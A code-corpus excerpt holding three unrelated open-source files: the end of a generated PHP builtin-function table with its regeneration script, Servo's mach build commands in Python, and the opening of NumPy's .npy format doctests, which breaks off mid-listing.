'trader_stochrsi', 'trader_sub', 'trader_sum', 'trader_t3', 'trader_tan', 'trader_tanh', 'trader_tema', 'trader_trange', 'trader_trima', 'trader_trix', 'trader_tsf', 'trader_typprice', 'trader_ultosc', 'trader_var', 'trader_wclprice', 'trader_willr', 'trader_wma'], 'URL': ['base64_decode', 'base64_encode', 'get_headers', 'get_meta_tags', 'http_build_query', 'parse_url', 'rawurldecode', 'rawurlencode', 'urldecode', 'urlencode'], 'Uopz': ['uopz_backup', 'uopz_compose', 'uopz_copy', 'uopz_delete', 'uopz_extend', 'uopz_flags', 'uopz_function', 'uopz_implement', 'uopz_overload', 'uopz_redefine', 'uopz_rename', 'uopz_restore', 'uopz_undefine'], 'Variable handling': ['boolval', 'debug_zval_dump', 'doubleval', 'empty', 'floatval', 'get_defined_vars', 'get_resource_type', 'gettype', 'import_request_variables', 'intval', 'is_array', 'is_bool', 'is_callable', 'is_double', 'is_float', 'is_int', 'is_integer', 'is_long', 'is_null', 'is_numeric', 'is_object', 'is_real', 'is_resource', 'is_scalar', 'is_string', 'isset', 'print_r', 'serialize', 'settype', 'strval', 'unserialize', 'unset', 'var_dump', 'var_export'], 'W32api': ['w32api_deftype', 'w32api_init_dtype', 'w32api_invoke_function', 'w32api_register_function', 'w32api_set_call_method'], 'WDDX': ['wddx_add_vars', 'wddx_deserialize', 'wddx_packet_end', 'wddx_packet_start', 'wddx_serialize_value', 'wddx_serialize_vars'], 'WinCache': ['wincache_fcache_fileinfo', 'wincache_fcache_meminfo', 'wincache_lock', 'wincache_ocache_fileinfo', 'wincache_ocache_meminfo', 'wincache_refresh_if_changed', 'wincache_rplist_fileinfo', 'wincache_rplist_meminfo', 'wincache_scache_info', 'wincache_scache_meminfo', 'wincache_ucache_add', 'wincache_ucache_cas', 'wincache_ucache_clear', 'wincache_ucache_dec', 'wincache_ucache_delete', 'wincache_ucache_exists', 'wincache_ucache_get', 'wincache_ucache_inc', 'wincache_ucache_info', 'wincache_ucache_meminfo', 'wincache_ucache_set', 'wincache_unlock'], 'XML Parser': ['utf8_decode', 'utf8_encode', 'xml_error_string', 'xml_get_current_byte_index', 'xml_get_current_column_number', 'xml_get_current_line_number', 'xml_get_error_code', 'xml_parse_into_struct', 'xml_parse', 'xml_parser_create_ns', 'xml_parser_create', 'xml_parser_free', 'xml_parser_get_option', 'xml_parser_set_option', 'xml_set_character_data_handler', 'xml_set_default_handler', 'xml_set_element_handler', 'xml_set_end_namespace_decl_handler', 'xml_set_external_entity_ref_handler', 'xml_set_notation_decl_handler', 'xml_set_object', 'xml_set_processing_instruction_handler', 'xml_set_start_namespace_decl_handler', 'xml_set_unparsed_entity_decl_handler'], 'XML-RPC': ['xmlrpc_decode_request', 'xmlrpc_decode', 'xmlrpc_encode_request', 'xmlrpc_encode', 'xmlrpc_get_type', 'xmlrpc_is_fault', 'xmlrpc_parse_method_descriptions', 'xmlrpc_server_add_introspection_data', 'xmlrpc_server_call_method', 'xmlrpc_server_create', 'xmlrpc_server_destroy', 'xmlrpc_server_register_introspection_callback', 'xmlrpc_server_register_method', 'xmlrpc_set_type'], 'XSLT (PHP 4)': ['xslt_backend_info', 'xslt_backend_name', 'xslt_backend_version', 'xslt_create', 'xslt_errno', 'xslt_error', 'xslt_free', 'xslt_getopt', 'xslt_process', 'xslt_set_base', 'xslt_set_encoding', 'xslt_set_error_handler', 'xslt_set_log', 'xslt_set_object', 'xslt_set_sax_handler', 'xslt_set_sax_handlers', 'xslt_set_scheme_handler', 'xslt_set_scheme_handlers', 'xslt_setopt'], 'Xhprof': ['xhprof_disable', 'xhprof_enable', 'xhprof_sample_disable', 'xhprof_sample_enable'], 'YAZ': ['yaz_addinfo', 'yaz_ccl_conf', 'yaz_ccl_parse', 
'yaz_close', 'yaz_connect', 'yaz_database', 'yaz_element', 'yaz_errno', 'yaz_error', 'yaz_es_result', 'yaz_es', 'yaz_get_option', 'yaz_hits', 'yaz_itemorder', 'yaz_present', 'yaz_range', 'yaz_record', 'yaz_scan_result', 'yaz_scan', 'yaz_schema', 'yaz_search', 'yaz_set_option', 'yaz_sort', 'yaz_syntax', 'yaz_wait'], 'YP/NIS': ['yp_all', 'yp_cat', 'yp_err_string', 'yp_errno', 'yp_first', 'yp_get_default_domain', 'yp_master', 'yp_match', 'yp_next', 'yp_order'], 'Yaml': ['yaml_emit_file', 'yaml_emit', 'yaml_parse_file', 'yaml_parse_url', 'yaml_parse'], 'Zip': ['zip_close', 'zip_entry_close', 'zip_entry_compressedsize', 'zip_entry_compressionmethod', 'zip_entry_filesize', 'zip_entry_name', 'zip_entry_open', 'zip_entry_read', 'zip_open', 'zip_read'], 'Zlib': ['gzclose', 'gzcompress', 'gzdecode', 'gzdeflate', 'gzencode', 'gzeof', 'gzfile', 'gzgetc', 'gzgets', 'gzgetss', 'gzinflate', 'gzopen', 'gzpassthru', 'gzputs', 'gzread', 'gzrewind', 'gzseek', 'gztell', 'gzuncompress', 'gzwrite', 'readgzfile', 'zlib_decode', 'zlib_encode', 'zlib_get_coding_type'], 'bcompiler': ['bcompiler_load_exe', 'bcompiler_load', 'bcompiler_parse_class', 'bcompiler_read', 'bcompiler_write_class', 'bcompiler_write_constant', 'bcompiler_write_exe_footer', 'bcompiler_write_file', 'bcompiler_write_footer', 'bcompiler_write_function', 'bcompiler_write_functions_from_file', 'bcompiler_write_header', 'bcompiler_write_included_filename'], 'cURL': ['curl_close', 'curl_copy_handle', 'curl_errno', 'curl_error', 'curl_escape', 'curl_exec', 'curl_file_create', 'curl_getinfo', 'curl_init', 'curl_multi_add_handle', 'curl_multi_close', 'curl_multi_exec', 'curl_multi_getcontent', 'curl_multi_info_read', 'curl_multi_init', 'curl_multi_remove_handle', 'curl_multi_select', 'curl_multi_setopt', 'curl_multi_strerror', 'curl_pause', 'curl_reset', 'curl_setopt_array', 'curl_setopt', 'curl_share_close', 'curl_share_init', 'curl_share_setopt', 'curl_strerror', 'curl_unescape', 'curl_version'], 'chdb': ['chdb_create'], 'dBase': ['dbase_add_record', 'dbase_close', 'dbase_create', 'dbase_delete_record', 'dbase_get_header_info', 'dbase_get_record_with_names', 'dbase_get_record', 'dbase_numfields', 'dbase_numrecords', 'dbase_open', 'dbase_pack', 'dbase_replace_record'], 'dbx': ['dbx_close', 'dbx_compare', 'dbx_connect', 'dbx_error', 'dbx_escape_string', 'dbx_fetch_row', 'dbx_query', 'dbx_sort'], 'filePro': ['filepro_fieldcount', 'filepro_fieldname', 'filepro_fieldtype', 'filepro_fieldwidth', 'filepro_retrieve', 'filepro_rowcount', 'filepro'], 'iconv': ['iconv_get_encoding', 'iconv_mime_decode_headers', 'iconv_mime_decode', 'iconv_mime_encode', 'iconv_set_encoding', 'iconv_strlen', 'iconv_strpos', 'iconv_strrpos', 'iconv_substr', 'iconv', 'ob_iconv_handler'], 'inclued': ['inclued_get_data'], 'intl': ['intl_error_name', 'intl_get_error_code', 'intl_get_error_message', 'intl_is_failure'], 'libxml': ['libxml_clear_errors', 'libxml_disable_entity_loader', 'libxml_get_errors', 'libxml_get_last_error', 'libxml_set_external_entity_loader', 'libxml_set_streams_context', 'libxml_use_internal_errors'], 'mSQL': ['msql_affected_rows', 'msql_close', 'msql_connect', 'msql_create_db', 'msql_createdb', 'msql_data_seek', 'msql_db_query', 'msql_dbname', 'msql_drop_db', 'msql_error', 'msql_fetch_array', 'msql_fetch_field', 'msql_fetch_object', 'msql_fetch_row', 'msql_field_flags', 'msql_field_len', 'msql_field_name', 'msql_field_seek', 'msql_field_table', 'msql_field_type', 'msql_fieldflags', 'msql_fieldlen', 'msql_fieldname', 'msql_fieldtable', 'msql_fieldtype', 
'msql_free_result', 'msql_list_dbs', 'msql_list_fields', 'msql_list_tables', 'msql_num_fields', 'msql_num_rows', 'msql_numfields', 'msql_numrows', 'msql_pconnect', 'msql_query', 'msql_regcase', 'msql_result', 'msql_select_db', 'msql_tablename', 'msql'], 'mnoGoSearch': ['udm_add_search_limit', 'udm_alloc_agent_array', 'udm_alloc_agent', 'udm_api_version', 'udm_cat_list', 'udm_cat_path', 'udm_check_charset', 'udm_check_stored', 'udm_clear_search_limits', 'udm_close_stored', 'udm_crc32', 'udm_errno', 'udm_error', 'udm_find', 'udm_free_agent', 'udm_free_ispell_data', 'udm_free_res', 'udm_get_doc_count', 'udm_get_res_field', 'udm_get_res_param', 'udm_hash32', 'udm_load_ispell_data', 'udm_open_stored', 'udm_set_agent_param'], 'mqseries': ['mqseries_back', 'mqseries_begin', 'mqseries_close', 'mqseries_cmit', 'mqseries_conn', 'mqseries_connx', 'mqseries_disc', 'mqseries_get', 'mqseries_inq', 'mqseries_open', 'mqseries_put1', 'mqseries_put', 'mqseries_set', 'mqseries_strerror'], 'mysqlnd_qc': ['mysqlnd_qc_clear_cache', 'mysqlnd_qc_get_available_handlers', 'mysqlnd_qc_get_cache_info', 'mysqlnd_qc_get_core_stats', 'mysqlnd_qc_get_normalized_query_trace_log', 'mysqlnd_qc_get_query_trace_log', 'mysqlnd_qc_set_cache_condition', 'mysqlnd_qc_set_is_select', 'mysqlnd_qc_set_storage_handler', 'mysqlnd_qc_set_user_handlers'], 'qtdom': ['qdom_error', 'qdom_tree'], 'runkit': ['runkit_class_adopt', 'runkit_class_emancipate', 'runkit_constant_add', 'runkit_constant_redefine', 'runkit_constant_remove', 'runkit_function_add', 'runkit_function_copy', 'runkit_function_redefine', 'runkit_function_remove', 'runkit_function_rename', 'runkit_import', 'runkit_lint_file', 'runkit_lint', 'runkit_method_add', 'runkit_method_copy', 'runkit_method_redefine', 'runkit_method_remove', 'runkit_method_rename', 'runkit_return_value_used', 'runkit_sandbox_output_handler', 'runkit_superglobals'], 'ssdeep': ['ssdeep_fuzzy_compare', 'ssdeep_fuzzy_hash_filename', 'ssdeep_fuzzy_hash'], 'vpopmail': ['vpopmail_add_alias_domain_ex', 'vpopmail_add_alias_domain', 'vpopmail_add_domain_ex', 'vpopmail_add_domain', 'vpopmail_add_user', 'vpopmail_alias_add', 'vpopmail_alias_del_domain', 'vpopmail_alias_del', 'vpopmail_alias_get_all', 'vpopmail_alias_get', 'vpopmail_auth_user', 'vpopmail_del_domain_ex', 'vpopmail_del_domain', 'vpopmail_del_user', 'vpopmail_error', 'vpopmail_passwd', 'vpopmail_set_user_quota'], 'win32ps': ['win32_ps_list_procs', 'win32_ps_stat_mem', 'win32_ps_stat_proc'], 'win32service': ['win32_continue_service', 'win32_create_service', 'win32_delete_service', 'win32_get_last_control_message', 'win32_pause_service', 'win32_query_service_status', 'win32_set_service_status', 'win32_start_service_ctrl_dispatcher', 'win32_start_service', 'win32_stop_service'], 'xattr': ['xattr_get', 'xattr_list', 'xattr_remove', 'xattr_set', 'xattr_supported'], 'xdiff': ['xdiff_file_bdiff_size', 'xdiff_file_bdiff', 'xdiff_file_bpatch', 'xdiff_file_diff_binary', 'xdiff_file_diff', 'xdiff_file_merge3', 'xdiff_file_patch_binary', 'xdiff_file_patch', 'xdiff_file_rabdiff', 'xdiff_string_bdiff_size', 'xdiff_string_bdiff', 'xdiff_string_bpatch', 'xdiff_string_diff_binary', 'xdiff_string_diff', 'xdiff_string_merge3', 'xdiff_string_patch_binary', 'xdiff_string_patch', 'xdiff_string_rabdiff']} if __name__ == '__main__': import glob import os import pprint import re import shutil import tarfile try: from urllib import urlretrieve except ImportError: from urllib.request import urlretrieve PHP_MANUAL_URL = 
'http://us3.php.net/distributions/manual/php_manual_en.tar.gz'
    PHP_MANUAL_DIR = './php-chunked-xhtml/'
    PHP_REFERENCE_GLOB = 'ref.*'
    PHP_FUNCTION_RE = '<a href="function\..*?\.html">(.*?)</a>'
    PHP_MODULE_RE = '<title>(.*?) Functions</title>'

    def get_php_functions():
        function_re = re.compile(PHP_FUNCTION_RE)
        module_re = re.compile(PHP_MODULE_RE)
        modules = {}
        for file in get_php_references():
            module = ''
            for line in open(file):
                if not module:
                    search = module_re.search(line)
                    if search:
                        module = search.group(1)
                        modules[module] = []
                elif 'href="function.' in line:
                    for match in function_re.finditer(line):
                        fn = match.group(1)
                        if '-&gt;' not in fn and '::' not in fn and fn not in modules[module]:
                            modules[module].append(fn)
            if module:
                # These are dummy manual pages, not actual functions
                if module == 'PHP Options/Info':
                    modules[module].remove('main')
                if module == 'Filesystem':
                    modules[module].remove('delete')
                if not modules[module]:
                    del modules[module]
        return modules

    def get_php_references():
        download = urlretrieve(PHP_MANUAL_URL)
        tar = tarfile.open(download[0])
        tar.extractall()
        tar.close()
        for file in glob.glob("%s%s" % (PHP_MANUAL_DIR, PHP_REFERENCE_GLOB)):
            yield file
        os.remove(download[0])

    def regenerate(filename, modules):
        f = open(filename)
        try:
            content = f.read()
        finally:
            f.close()

        header = content[:content.find('MODULES = {')]
        footer = content[content.find("if __name__ == '__main__':"):]

        f = open(filename, 'w')
        f.write(header)
        f.write('MODULES = %s\n\n' % pprint.pformat(modules))
        f.write(footer)
        f.close()

    def run():
        print('>> Downloading Function Index')
        modules = get_php_functions()
        total = sum(len(v) for v in modules.values())
        print('%d functions found' % total)
        regenerate(__file__, modules)
        shutil.rmtree(PHP_MANUAL_DIR)

    run()
mit
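The record above ends with the generated MODULES table, a mapping from PHP extension name to the builtin functions it provides, plus the script that rebuilds that table from the downloaded PHP manual. As a small illustration of how such a table is typically consumed, the sketch below inverts the mapping so a function name can be resolved to its owning extension, which is essentially what a lexer needs when deciding whether an identifier is a builtin. This sketch is not part of the original file; the helper name and the two-module stand-in dict are made up for the example.

# Illustrative sketch only: invert a MODULES-style {extension: [functions]} table
# into a {function: extension} index for constant-time lookups. The tiny MODULES
# literal here is a stand-in for the full table in the file above.
MODULES = {
    'Zlib': ['gzopen', 'gzread', 'gzclose'],
    'cURL': ['curl_init', 'curl_exec', 'curl_close'],
}

def build_function_index(modules):
    index = {}
    for extension, functions in modules.items():
        for name in functions:
            index[name] = extension
    return index

FUNCTION_INDEX = build_function_index(MODULES)
print(FUNCTION_INDEX['curl_init'])          # cURL
print(FUNCTION_INDEX.get('gzread'))         # Zlib
print(FUNCTION_INDEX.get('not_a_builtin'))  # None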
walac/servo
python/servo/build_commands.py
3
12824
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT # file at the top-level directory of this distribution. # # Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or # http://www.apache.org/licenses/LICENSE-2.0> or the MIT license # <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your # option. This file may not be copied, modified, or distributed # except according to those terms. from __future__ import print_function, unicode_literals import os import os.path as path import subprocess import sys from time import time from mach.decorators import ( CommandArgument, CommandProvider, Command, ) from servo.command_base import CommandBase, cd def is_headless_build(): return int(os.getenv('SERVO_HEADLESS', 0)) == 1 def notify_linux(title, text): try: import dbus bus = dbus.SessionBus() notify_obj = bus.get_object("org.freedesktop.Notifications", "/org/freedesktop/Notifications") method = notify_obj.get_dbus_method("Notify", "org.freedesktop.Notifications") method(title, 0, "", text, "", [], [], -1) except: raise Exception("Please make sure that the Python dbus module is installed!") def notify_win(title, text): from ctypes import Structure, windll, POINTER, sizeof from ctypes.wintypes import DWORD, HANDLE, WINFUNCTYPE, BOOL, UINT class FLASHWINDOW(Structure): _fields_ = [("cbSize", UINT), ("hwnd", HANDLE), ("dwFlags", DWORD), ("uCount", UINT), ("dwTimeout", DWORD)] FlashWindowExProto = WINFUNCTYPE(BOOL, POINTER(FLASHWINDOW)) FlashWindowEx = FlashWindowExProto(("FlashWindowEx", windll.user32)) FLASHW_CAPTION = 0x01 FLASHW_TRAY = 0x02 FLASHW_TIMERNOFG = 0x0C params = FLASHWINDOW(sizeof(FLASHWINDOW), windll.kernel32.GetConsoleWindow(), FLASHW_CAPTION | FLASHW_TRAY | FLASHW_TIMERNOFG, 3, 0) FlashWindowEx(params) def notify_darwin(title, text): try: import Foundation import objc NSUserNotification = objc.lookUpClass("NSUserNotification") NSUserNotificationCenter = objc.lookUpClass("NSUserNotificationCenter") note = NSUserNotification.alloc().init() note.setTitle_(title) note.setInformativeText_(text) now = Foundation.NSDate.dateWithTimeInterval_sinceDate_(0, Foundation.NSDate.date()) note.setDeliveryDate_(now) centre = NSUserNotificationCenter.defaultUserNotificationCenter() centre.scheduleNotification_(note) except ImportError: raise Exception("Please make sure that the Python pyobjc module is installed!") def notify_build_done(elapsed): """Generate desktop notification when build is complete and the elapsed build time was longer than 30 seconds.""" if elapsed > 30: notify("Servo build", "Completed in %0.2fs" % elapsed) def notify(title, text): """Generate a desktop notification using appropriate means on supported platforms Linux, Windows, and Mac OS. On unsupported platforms, this function acts as a no-op.""" platforms = { "linux": notify_linux, "win": notify_win, "darwin": notify_darwin } func = platforms.get(sys.platform) if func is not None: try: func(title, text) except Exception as e: extra = getattr(e, "message", "") print("[Warning] Could not generate notification! 
%s" % extra, file=sys.stderr) def call(*args, **kwargs): """Wrap `subprocess.call`, printing the command if verbose=True.""" verbose = kwargs.pop('verbose', False) if verbose: print(' '.join(args[0])) return subprocess.call(*args, **kwargs) @CommandProvider class MachCommands(CommandBase): @Command('build', description='Build Servo', category='build') @CommandArgument('--target', '-t', default=None, help='Cross compile for given target platform') @CommandArgument('--release', '-r', action='store_true', help='Build in release mode') @CommandArgument('--dev', '-d', action='store_true', help='Build in development mode') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--android', default=None, action='store_true', help='Build for Android') @CommandArgument('--debug-mozjs', default=None, action='store_true', help='Enable debug assertions in mozjs') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('params', nargs='...', help="Command-line arguments to be passed through to Cargo") def build(self, target=None, release=False, dev=False, jobs=None, android=None, verbose=False, debug_mozjs=False, params=None): if android is None: android = self.config["build"]["android"] opts = params or [] features = [] base_path = self.get_target_dir() release_path = path.join(base_path, "release", "servo") dev_path = path.join(base_path, "debug", "servo") release_exists = path.exists(release_path) dev_exists = path.exists(dev_path) if not (release or dev): if self.config["build"]["mode"] == "dev": dev = True elif self.config["build"]["mode"] == "release": release = True elif release_exists and not dev_exists: release = True elif dev_exists and not release_exists: dev = True else: print("Please specify either --dev (-d) for a development") print(" build, or --release (-r) for an optimized build.") sys.exit(1) if release and dev: print("Please specify either --dev or --release.") sys.exit(1) self.ensure_bootstrapped() if release: opts += ["--release"] if target: opts += ["--target", target] if jobs is not None: opts += ["-j", jobs] if verbose: opts += ["-v"] if android: # Ensure the APK builder submodule has been built first apk_builder_dir = "support/android-rs-glue" with cd(path.join(apk_builder_dir, "apk-builder")): status = call(["cargo", "build"], env=self.build_env(), verbose=verbose) if status: return status opts += ["--target", "arm-linux-androideabi"] if debug_mozjs or self.config["build"]["debug-mozjs"]: features += ["script/debugmozjs"] if is_headless_build(): opts += ["--no-default-features"] features += ["headless"] if android: features += ["android_glue"] if features: opts += ["--features", "%s" % ' '.join(features)] build_start = time() env = self.build_env() if android: # Build OpenSSL for android make_cmd = ["make"] if jobs is not None: make_cmd += ["-j" + jobs] with cd(self.android_support_dir()): status = call( make_cmd + ["-f", "openssl.makefile"], env=self.build_env(), verbose=verbose) if status: return status openssl_dir = path.join(self.android_support_dir(), "openssl-1.0.1k") env['OPENSSL_LIB_DIR'] = openssl_dir env['OPENSSL_INCLUDE_DIR'] = path.join(openssl_dir, "include") env['OPENSSL_STATIC'] = 'TRUE' status = call( ["cargo", "build"] + opts, env=env, cwd=self.servo_crate(), verbose=verbose) elapsed = time() - build_start # Generate Desktop Notification if elapsed-time > some threshold value notify_build_done(elapsed) print("Build completed in %0.2fs" % elapsed) # XXX(#7339) 
Android build is broken if android: return 0 return status @Command('build-cef', description='Build the Chromium Embedding Framework library', category='build') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('--release', '-r', action='store_true', help='Build in release mode') def build_cef(self, jobs=None, verbose=False, release=False): self.ensure_bootstrapped() ret = None opts = [] if jobs is not None: opts += ["-j", jobs] if verbose: opts += ["-v"] if release: opts += ["--release"] build_start = time() with cd(path.join("ports", "cef")): ret = call(["cargo", "build"] + opts, env=self.build_env(), verbose=verbose) elapsed = time() - build_start # Generate Desktop Notification if elapsed-time > some threshold value notify_build_done(elapsed) print("CEF build completed in %0.2fs" % elapsed) return ret @Command('build-gonk', description='Build the Gonk port', category='build') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('--release', '-r', action='store_true', help='Build in release mode') def build_gonk(self, jobs=None, verbose=False, release=False): self.ensure_bootstrapped() ret = None opts = [] if jobs is not None: opts += ["-j", jobs] if verbose: opts += ["-v"] if release: opts += ["--release"] opts += ["--target", "arm-linux-androideabi"] env = self.build_env(gonk=True) build_start = time() with cd(path.join("ports", "gonk")): ret = call(["cargo", "build"] + opts, env=env, verbose=verbose) elapsed = time() - build_start # Generate Desktop Notification if elapsed-time > some threshold value notify_build_done(elapsed) print("Gonk build completed in %0.2fs" % elapsed) return ret @Command('build-tests', description='Build the Servo test suites', category='build') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--release', default=False, action="store_true", help="Build tests with release mode") def build_tests(self, jobs=None, verbose=False, release=False): self.ensure_bootstrapped() args = ["cargo", "test", "--no-run"] if is_headless_build(): args += ["--no-default-features", "--features", "headless"] if release: args += ["--release"] return call( args, env=self.build_env(), cwd=self.servo_crate(), verbose=verbose) @Command('clean', description='Clean the build directory.', category='build') @CommandArgument('--manifest-path', default=None, help='Path to the manifest to the package to clean') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('params', nargs='...', help="Command-line arguments to be passed through to Cargo") def clean(self, manifest_path, params, verbose=False): self.ensure_bootstrapped() opts = [] if manifest_path: opts += ["--manifest-path", manifest_path] if verbose: opts += ["-v"] opts += params return call(["cargo", "clean"] + opts, env=self.build_env(), cwd=self.servo_crate(), verbose=verbose)
mpl-2.0
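The build_commands.py record above routes desktop notifications through a small platform dispatch: notify() picks notify_linux / notify_win / notify_darwin by sys.platform and reports failures as a warning, and notify_build_done() only notifies when the build exceeded 30 seconds. The stand-alone sketch below mirrors just that control flow with printing stand-ins; the stub bodies are placeholders for the real dbus / FlashWindowEx / NSUserNotification calls and are not taken from the original file.

# Sketch of the notify()/notify_build_done() dispatch used above, with printing
# stubs in place of the platform-specific dbus / Win32 / Cocoa notifiers.
import sys

def notify_linux(title, text):
    print("[linux] %s: %s" % (title, text))

def notify_win(title, text):
    print("[windows] %s: %s" % (title, text))

def notify_darwin(title, text):
    print("[macos] %s: %s" % (title, text))

def notify(title, text):
    # Same lookup-by-sys.platform pattern as the original; unknown platforms are a no-op.
    platforms = {"linux": notify_linux, "win": notify_win, "darwin": notify_darwin}
    func = platforms.get(sys.platform)
    if func is not None:
        try:
            func(title, text)
        except Exception as e:
            print("[Warning] Could not generate notification! %s" % e, file=sys.stderr)

def notify_build_done(elapsed):
    # Only bother the user for builds longer than 30 seconds, as in the original.
    if elapsed > 30:
        notify("Servo build", "Completed in %0.2fs" % elapsed)

notify_build_done(45.2)  # long build: fires a notification
notify_build_done(3.1)   # quick build: stays silent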
Denisolt/Tensorflow_Chat_Bot
local/lib/python2.7/site-packages/numpy/lib/tests/test_format.py
27
34230
from __future__ import division, absolute_import, print_function r''' Test the .npy file format. Set up: >>> import sys >>> from io import BytesIO >>> from numpy.lib import format >>> >>> scalars = [ ... np.uint8, ... np.int8, ... np.uint16, ... np.int16, ... np.uint32, ... np.int32, ... np.uint64, ... np.int64, ... np.float32, ... np.float64, ... np.complex64, ... np.complex128, ... object, ... ] >>> >>> basic_arrays = [] >>> >>> for scalar in scalars: ... for endian in '<>': ... dtype = np.dtype(scalar).newbyteorder(endian) ... basic = np.arange(15).astype(dtype) ... basic_arrays.extend([ ... np.array([], dtype=dtype), ... np.array(10, dtype=dtype), ... basic, ... basic.reshape((3,5)), ... basic.reshape((3,5)).T, ... basic.reshape((3,5))[::-1,::2], ... ]) ... >>> >>> Pdescr = [ ... ('x', 'i4', (2,)), ... ('y', 'f8', (2, 2)), ... ('z', 'u1')] >>> >>> >>> PbufferT = [ ... ([3,2], [[6.,4.],[6.,4.]], 8), ... ([4,3], [[7.,5.],[7.,5.]], 9), ... ] >>> >>> >>> Ndescr = [ ... ('x', 'i4', (2,)), ... ('Info', [ ... ('value', 'c16'), ... ('y2', 'f8'), ... ('Info2', [ ... ('name', 'S2'), ... ('value', 'c16', (2,)), ... ('y3', 'f8', (2,)), ... ('z3', 'u4', (2,))]), ... ('name', 'S2'), ... ('z2', 'b1')]), ... ('color', 'S2'), ... ('info', [ ... ('Name', 'U8'), ... ('Value', 'c16')]), ... ('y', 'f8', (2, 2)), ... ('z', 'u1')] >>> >>> >>> NbufferT = [ ... ([3,2], (6j, 6., ('nn', [6j,4j], [6.,4.], [1,2]), 'NN', True), 'cc', ('NN', 6j), [[6.,4.],[6.,4.]], 8), ... ([4,3], (7j, 7., ('oo', [7j,5j], [7.,5.], [2,1]), 'OO', False), 'dd', ('OO', 7j), [[7.,5.],[7.,5.]], 9), ... ] >>> >>> >>> record_arrays = [ ... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')), ... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')), ... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')), ... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')), ... ] Test the magic string writing. >>> format.magic(1, 0) '\x93NUMPY\x01\x00' >>> format.magic(0, 0) '\x93NUMPY\x00\x00' >>> format.magic(255, 255) '\x93NUMPY\xff\xff' >>> format.magic(2, 5) '\x93NUMPY\x02\x05' Test the magic string reading. >>> format.read_magic(BytesIO(format.magic(1, 0))) (1, 0) >>> format.read_magic(BytesIO(format.magic(0, 0))) (0, 0) >>> format.read_magic(BytesIO(format.magic(255, 255))) (255, 255) >>> format.read_magic(BytesIO(format.magic(2, 5))) (2, 5) Test the header writing. >>> for arr in basic_arrays + record_arrays: ... f = BytesIO() ... format.write_array_header_1_0(f, arr) # XXX: arr is not a dict, items gets called on it ... print(repr(f.getvalue())) ... 
"F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<u2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>u2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<i2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>i2', 